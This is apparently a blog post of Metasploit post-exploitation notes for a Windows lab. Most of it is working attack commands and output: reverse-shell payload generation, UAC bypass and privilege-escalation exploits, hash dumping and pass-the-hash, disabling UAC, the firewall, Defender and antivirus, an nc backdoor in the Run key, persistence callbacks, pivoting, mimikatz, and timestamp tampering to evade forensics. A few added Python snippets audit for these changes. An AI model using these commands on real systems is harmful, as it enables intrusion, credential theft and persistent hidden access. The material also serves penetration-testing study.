#### 1. Preparation

- Expanding the foothold after gaining control of the target system
  - Privilege escalation
  - Information gathering
  - Internal network penetration
  - Persistent backdoor
- Expanding the foothold from an existing session
  - Generate the payload:

    ```
    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o payload.exe
    ```

  - Listen on Kali:

    ```
    msf > use exploit/multi/handler
    msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    msf exploit(multi/handler) > set LHOST 10.0.0.128
    msf exploit(multi/handler) > exploit -j
    ```

  - Run payload.exe on the Windows system
  - On Kali, enter the meterpreter session:

    ```
    msf exploit(multi/handler) > sessions

    Active sessions

    Id  Name  Type                     Information              Connection

    1         meterpreter x86/windows  WIN7-VM\John @ WIN7-VM   10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132)

    msf exploit(multi/handler) > sessions -i 1
    [*] Starting interaction with 1...

    meterpreter > getuid
    Server username: WIN7-VM\John
    ```

#### 2. Getting SYSTEM account privileges

- Privilege escalation fails, usually because of UAC restrictions:

```
meterpreter > getuid
Server username: WIN7-VM\John
meterpreter > load priv
[-] The 'priv' extension has already been loaded.
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

meterpreter > background
```

- Bypassing UAC

- use exploit/windows/local/ask

```
use exploit/windows/local/ask
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
set FILENAME win_update.exe
set SESSION 1
exploit
```

![img](ai4HMWI.png)

![img](D:\blog\source\_posts\msf后渗透部分学习\MXYqrBh.png)

```
meterpreter > getsystem
meterpreter > getuid
```

![img](D:\blog\source\_posts\msf后渗透部分学习\uHed9pJ.png)

- use exploit/windows/local/bypassuac

```
use exploit/windows/local/bypassuac
set SESSION 1
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
show targets
exploit
```

![img](D:\blog\source\_posts\msf后渗透部分学习\eO3yUbv.png)

- use exploit/windows/local/bypassuac_injection

```
use exploit/windows/local/bypassuac_injection
set SESSION 1
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
exploit
```

![img](D:\blog\source\_posts\msf后渗透部分学习\VwGyhJD.png)

- Exploit a local vulnerability to escalate directly to SYSTEM

- use exploit/windows/local/ms13_053_schlamperei

```
use exploit/windows/local/ms13_053_schlamperei
set SESSION 1
```

![img](https://i.imgur.com/VkGx24J.png)



- use exploit/windows/local/ms13_081_track_popup_menu

```
use exploit/windows/local/ms13_081_track_popup_menu
set SESSION 1
exploit
```

![img](D:\blog\source\_posts\msf后渗透部分学习\VkGx24J.png)



- use exploit/windows/local/ms13_097_ie_registry_symlink

```
use exploit/windows/local/ms13_097_ie_registry_symlink
set SESSION 1
set URIPATH /
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
set SRVHOST 10.0.0.128
exploit
```

- use exploit/windows/local/ppr_flatten_rec

```
use exploit/windows/local/ppr_flatten_rec
set SESSION 1
exploit
```

![img](https://i.imgur.com/Jhqu2n4.png)



- Graphical (VNC) payload

- set payload windows/vncinject/reverse_tcp

```
use exploit/windows/local/ppr_flatten_rec
set payload windows/vncinject/reverse_tcp
set SESSION 1
set LHOST 10.0.0.128
set ViewOnly false
exploit
```

![img](https://i.imgur.com/wOXJo7u.png)

- Disabling UAC

- Obtain a hashdump:

```
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
```
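A defender's reading of the hashdump above, as an added example that is not part of the original post: every account in the dump carries the well-known hash of the empty password, so all three have blank passwords, and any non-empty LM hash would show that LM hashing is still enabled. The parser takes pwdump-format lines (`user:rid:LM:NT:::`) and the sample input is the page's own three lines.

```python
"""Audit pwdump-style hashdump output (user:rid:LM:NT:::) for weak credential material."""

# Well-known hashes of the empty password. Seeing them means the account has no
# password at all. The NT hash itself, blank or not, is what an SMB pass-the-hash
# login (psexec's SMBPass) uses, so rotating the password is what invalidates it.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# The three lines exactly as shown in the hashdump on this page.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def parse_hashdump(text):
    """Parse 'user:rid:lm:nt:::' lines into dicts, skipping anything else (prompts, blanks)."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        accounts.append({"user": parts[0], "rid": int(parts[1]),
                         "lm": parts[2].lower(), "nt": parts[3].lower()})
    return accounts


def audit_hashes(accounts):
    """Return (user, finding) pairs for blank passwords and stored LM hashes."""
    findings = []
    for acct in accounts:
        if acct["nt"] == EMPTY_NT:
            findings.append((acct["user"], "blank password"))
        if acct["lm"] != EMPTY_LM:
            findings.append((acct["user"], "LM hash stored (LM hashing still enabled)"))
    return findings


if __name__ == "__main__":
    for user, finding in audit_hashes(parse_hashdump(SAMPLE_HASHDUMP)):
        print(f"{user}: {finding}")
```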

- Try to use the hash (pass-the-hash over SMB):

```
use exploit/windows/smb/psexec
set RHOST 10.0.0.132
set SMBUser John
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
exploit
```

![img](https://i.imgur.com/vXDrNNx.png)

Error: Exploit failed [no-access]

- UAC has to be disabled first:

```
sessions -i 2
shell
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
shutdown -r -t 0
```

![img](https://i.imgur.com/WJBykgA.png)

- Try again:

```
use exploit/windows/smb/psexec
set RHOST 10.0.0.132
set SMBUser John
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
exploit
```

#### 4. Basic operations

##### Disabling the firewall

- Requires administrator or SYSTEM privileges

```
netsh advfirewall set allprofiles state on
netsh advfirewall set allprofiles state off
```

![img](https://i.imgur.com/VsB8p0A.png)

##### Disabling windefend

- Look up the service name

![img](https://i.imgur.com/SITzUbY.png)

- Stop the service

```
net stop windefend
```

##### BitLocker encryption

- manage-bde -off C:
- manage-bde -status C:

##### Disabling DEP

- bcdedit.exe /set {current} nx AlwaysOff

##### Killing antivirus software

- run killav
- run post/windows/manage/killav

##### Enabling the Remote Desktop service

Enable the service:

```
run post/windows/manage/enable_rdp
```

![img](https://i.imgur.com/Dl02OVL.png)

Disable the service (using the cleanup script saved in loot):

```
run multi_console_command -rc root/.msf4/loot/20180418001805_default_10.0.0.132_host.windows.cle_842354.txt
```

Enable the service with getgui:

```
run getgui -e
run getgui -u yuanfh -p pass
run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20160824.1855.rc
```

##### Viewing the remote desktop

- screenshot
- use espia
- screengrab

##### Attacking the domain controller with tokens

A token is bound to an account at every logon; it is presented for authentication when accessing resources, similar to a web cookie.

- Incognito
- A standalone tool, integrated into meterpreter by msf
- No password, cracking, or password hash needed: steal a token and impersonate another user
- Especially useful for escalating across multiple systems in a domain environment
- Set up a domain environment
- DC + XP
- load incognito
- `list_tokens -u`
- `impersonate_token lab\administrator`
- The commands above require getsystem
- A local low-privilege user must escalate locally first
- `use exploit/windows/local/ms10_015_kitrap0d`
- `execute -f cmd.exe -i -t  # -t:` run the program with the currently impersonated token
- shell

##### Registry

- The registry holds almost all of Windows' configuration parameters
- Improper modification can crash the system outright
- Back up the registry completely before modifying it
- Some registry modifications are irreversible
- Common uses
- Modifying or adding startup entries
- Stealing secrets stored in the registry
- Evading file-based antivirus scanning
- Adding an nc backdoor service via the registry (meterpreter)

```
meterpreter >
upload /usr/share/windows-binaries/nc.exe C:\windows\system32
reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'
reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v nc
```

- Open a firewall port (meterpreter)

```
meterpreter >
execute -f cmd -i -H
netsh firewall show opmode
netsh firewall add portopening TCP 4444 "test" ENABLE ALL
shutdown -r -f -t 0
nc 10.0.0.132 444
```
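An audit for the two registry changes this page makes, the UAC policy values set before the psexec retry and the nc entry written to the Run key, as an added example that is not part of the original post. It parses the text that `reg query` prints for those keys (the sample output is constructed, with one benign entry mixed in) and flags EnableLUA=0, LocalAccountTokenFilterPolicy=1 and any autostart value that runs nc with `-e`.

```python
import re

# Constructed sample of `reg query` output (not taken from the page), covering the
# two keys this page modifies: the UAC policy values and the Run autostart key.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLUA    REG_DWORD    0x0
    LocalAccountTokenFilterPolicy    REG_DWORD    0x1
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    nc    REG_SZ    C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe
"""

# A command line that runs nc/ncat/netcat with -e (binds a program to the socket).
NC_LISTENER = re.compile(r"\b(nc|ncat|netcat)(\.exe)?\b.*\s-e\b", re.IGNORECASE)


def parse_reg_query(text):
    """Return {key_path: {value_name: (type, data)}} from `reg query` style text."""
    keys, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():                 # unindented line = key path
            current = line.strip()
            keys.setdefault(current, {})
        elif current is not None:                 # indented line = "name  TYPE  data"
            parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
            if len(parts) == 3:
                keys[current][parts[0]] = (parts[1], parts[2])
    return keys


def _dword(values, name):
    entry = values.get(name)
    return int(entry[1], 16) if entry and entry[0] == "REG_DWORD" else None


def audit_registry(keys):
    """Flag the UAC weakening and the Run-key shell listener this page describes."""
    findings = []
    for key, values in keys.items():
        k = key.lower()
        if k.endswith(r"\policies\system"):
            if _dword(values, "EnableLUA") == 0:
                findings.append("EnableLUA=0: UAC is disabled")
            if _dword(values, "LocalAccountTokenFilterPolicy") == 1:
                findings.append("LocalAccountTokenFilterPolicy=1: local admin accounts get a "
                                "full token over the network (remote UAC filtering off)")
        elif k.endswith(r"\currentversion\run"):
            for name, (_, data) in values.items():
                if NC_LISTENER.search(data):
                    findings.append(f"Run value '{name}' starts a shell listener: {data}")
    return findings
```

On a live host the same text comes from `reg query <key>` run per key; the parser ignores the blank lines and the benign entries.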

- Other registry keys
- https://support.accessdata.com/hc/en-us/articles/204448155-Registry-Quick-Find-Chart

##### Packet capture

- Packet capture (meterpreter)

```
load sniffer
sniffer_interfaces
sniffer_start 2
sniffer_dump 2 1.cap
```

- Captured packets are kept in a ring buffer in memory (50000 packets); nothing is written to disk
- Meterpreter's own traffic is filtered out automatically, and the whole transfer is encrypted with SSL/TLS

- Decoding the capture

- use auxiliary/sniffer/psnuffle
- set PCAPFILE /root/1.cap

##### Searching for files

- search -f *.ini
- search -d c:\documents\ and\ settings\administrator\desktop\ -f *.docx

##### Cracking weak passwords

- Cracking weak passwords with John the Ripper

```
use post/windows/gather/hashdump  # requires a SYSTEM-level meterpreter
run                               # results are saved under /tmp
use auxiliary/analyze/jtr_crack_fast
run
```

##### Covering tracks

- File system access leaves traces, and digital forensics focuses on them
- Penetration testers and attackers usually want to destroy the traces of file system access
- The best way to avoid forensic detection: do not touch the file system at all
- This is meterpreter's built-in advantage (it lives entirely in memory)
- MAC times (Modified / Accessed / Changed)
- ls -l --time=atime/mtime/ctime 1.txt
- stat 1.txt
- touch -d "2 days ago" 1.txt
- touch -t 1501010101 1.txt
- MACE: MFT entry
- MFT: the Master File Table of the NTFS file system
- Usually 1024 bytes or two disk sectors, holding several entry records
- Contains extensive information about a file (size, name, directory, disk location, creation date)
- See file system forensic analysis for more
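The forensic catch behind the touch commands above, as an added example that is not part of the original post: on Linux, `touch -d` / `touch -t` (the utime() call underneath) can rewrite atime and mtime, but the kernel always stamps ctime with the current time, so a file whose ctime is much newer than its mtime was timestamped after the fact. The check below creates a temporary file, backdates it the way the page does, and reports the mismatch.

```python
"""Spot backdated mtime: utime() sets atime/mtime, but ctime is always set to 'now'."""
import os
import tempfile
import time


def backdate(path, seconds_ago):
    """Equivalent of `touch -d "<n> ago" path`: rewrites atime and mtime only."""
    t = time.time() - seconds_ago
    os.utime(path, (t, t))                   # ctime is updated to now by the kernel


def looks_timestomped(path, slack=60):
    """True when ctime is more than `slack` seconds newer than mtime.

    Not proof on its own: a file copied with cp -p or extracted from an
    archive shows the same gap, so corroborate before drawing conclusions.
    """
    st = os.stat(path)
    return (st.st_ctime - st.st_mtime) > slack


def demo(days=2):
    """Create 1.txt, check it, backdate it like `touch -d "2 days ago"`, check again."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "1.txt")
        with open(path, "w") as fh:
            fh.write("sample content (constructed)\n")
        before = looks_timestomped(path)     # fresh file: ctime == mtime
        backdate(path, days * 86400)
        after = looks_timestomped(path)      # mtime is 2 days old, ctime is now
        return before, after


if __name__ == "__main__":
    print("before/after backdating:", demo())
```

On NTFS the analogous check compares the $STANDARD_INFORMATION timestamps against the $FILE_NAME timestamps in the file's MFT entry, since the Win32 SetFileTime API only rewrites the former.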

##### Pivoting

- Build the payload with msfvenom:

```
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=kali_firewall LPORT=4444 -b "\x00\xff" -e x86/shikata_ga_nai -f exe -o payload.exe
```

- Obtain SYSTEM privileges

    ![img](https://i.imgur.com/PXgwA0S.png)

- Use a machine already under control as the jump host into the internal network

- To the other internal machines, all access appears to come from the jump host

- run autoroute -s 1.1.1.0/24  # internal subnet of the target that cannot reach the internet

- Real-world autoroute scenario
  - Attack an internal XP host through Win7 (compare the cases where XP does and does not have internet access)
  - Scan the internal network: use auxiliary/scanner/portscan/tcp

- Pivoting via port forwarding (portfwd)
  - Use the compromised machine to forward ports between Kali and the target:

```
portfwd add -L LIP -l LPORT -r RIP -p RPORT
portfwd add -L 1.1.1.10 -l 445 -r 2.1.1.11 -p 3389
portfwd list / delete / flush
```

- use exploit/windows/smb/ms08_067_netapi

```
use exploit/windows/smb/ms08_067_netapi
set RHOST 127.0.0.1
set LHOST 2.1.1.10
```

- use exploit/multi/handler

- set exitonsession false

#### Persistent backdoor

- A meterpreter obtained through an exploit runs only in memory and is lost on reboot
- Re-exploiting the vulnerability may crash the service
- A persistent backdoor keeps remote control even after the vulnerability is patched

- meterpreter backdoor (metsvc)

```
run metsvc -A  # -r removes it
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337
set RHOST 1.1.1.1
```

- persistence script

```
run persistence -h
run persistence -X -i 10 -p 4444 -r 10.0.0.128
run persistence -U -i 20 -p 4444 -r 10.0.0.128
run persistence -S -i 20 -p 4444 -r 10.0.0.128
```

##### mimikatz

- hashdump uses part of mimikatz's functionality

```
getsystem
load mimikatz
wdigest / kerberos / msv / ssp / tspkg / livessp
mimikatz_command -h
mimikatz_command -f a::
mimikatz_command -f samdump::hashes
mimikatz_command -f handle::list
mimikatz_command -f service::list
mimikatz_command -f crypto::listProviders
mimikatz_command -f winmine::infos  # Minesweeper
```